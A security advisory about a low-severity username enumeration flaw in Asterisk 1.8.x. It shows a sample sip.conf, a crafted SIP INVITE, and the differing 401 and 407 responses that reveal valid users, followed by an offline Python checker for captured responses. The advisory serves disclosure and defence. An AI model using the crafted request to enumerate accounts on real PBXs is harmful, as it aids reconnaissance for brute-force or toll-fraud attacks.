Asterisk version 1.8.x suffers from a SIP remote user enumeration vulnerability.
Asterisk: SIP responses permit username identification through use of INVITE
Author: francesco.tornieri "At" verona-wireless.net
Summary: SIP responses permit user identification
Release Date: 01/05/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.x (tested 1.8.3.2)
Description:
It is possible to enumerate valid SIP usernames by using the INVITE request method instead of the REGISTER method (a similar problem was fixed by Digium in 2009 and is described in http://downloads.asterisk.org/pub/security/AST-2009-003.html).
Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=192.168.2.1
realm=asterisk
allowguest=no
alwaysauthreject=yes <----
[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729
[100](template)
callerid=phone100<100>
username=100
secret=password
[500](template)
callerid=phone200<500>
username=500
secret=password
------------------------
Crafted SIP INVITE example
------------------------
INVITE sip:192.168.2.1 SIP/2.0
CSeq: 3 INVITE
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2
To: <sip:500@192.168.2.1>
Contact: <sip:105@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 0
Max-Forwards: 70
----------------
Method: INVITE
----------------
Valid user (user 100)
Response:
---
Received: SIP/2.0 401 Unauthorized
---
Invalid user (user 1008)
Response:
---
Received: SIP/2.0 407 Proxy Authentication Required
---
Francesco Tornieri
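
The 401-versus-407 difference reported above can be checked offline against responses captured from your own PBX. The following is an added example, not part of the original advisory or of Asterisk; the function names and the header values in the sample responses are constructed for illustration.

```python
import re

# Matches the status line with or without the "Received: " prefix used above.
STATUS_RE = re.compile(r"SIP/2\.0 (\d{3})")
CHALLENGE_HEADERS = ("www-authenticate", "proxy-authenticate")

def fingerprint(raw):
    """Reduce a raw SIP response to the parts that show which auth path ran:
    the status code and which challenge header(s) are present."""
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    m = STATUS_RE.search(lines[0])
    if not m:
        raise ValueError("not a SIP response: %r" % lines[0])
    challenges = set()
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name = line.split(":", 1)[0].strip().lower()
        if name in CHALLENGE_HEADERS:
            challenges.add(name)
    return int(m.group(1)), tuple(sorted(challenges))

def leaks_user_existence(known_user_resp, unknown_user_resp):
    """True when a configured and an unconfigured user get responses that
    can be told apart by status code or challenge header."""
    return fingerprint(known_user_resp) != fingerprint(unknown_user_resp)

# Constructed samples: status lines are the ones reported in the advisory,
# header values (nonce etc.) are placeholders.
KNOWN = ("Received: SIP/2.0 401 Unauthorized\r\n"
         'WWW-Authenticate: Digest realm="asterisk", nonce="0000"\r\n'
         "Content-Length: 0\r\n\r\n")
UNKNOWN = ("Received: SIP/2.0 407 Proxy Authentication Required\r\n"
           'Proxy-Authenticate: Digest realm="asterisk", nonce="1111"\r\n'
           "Content-Length: 0\r\n\r\n")
# Constructed: what a uniform rejection looks like (only the nonce differs).
UNIFORM = KNOWN.replace("0000", "2222")

if __name__ == "__main__":
    print("advisory behaviour leaks:", leaks_user_existence(KNOWN, UNKNOWN))
    print("uniform rejection leaks: ", leaks_user_existence(KNOWN, UNIFORM))
```

With alwaysauthreject=yes the expected result for a configured and an unconfigured user is no distinguishable difference; a True result on captured INVITE responses reproduces the behaviour described here.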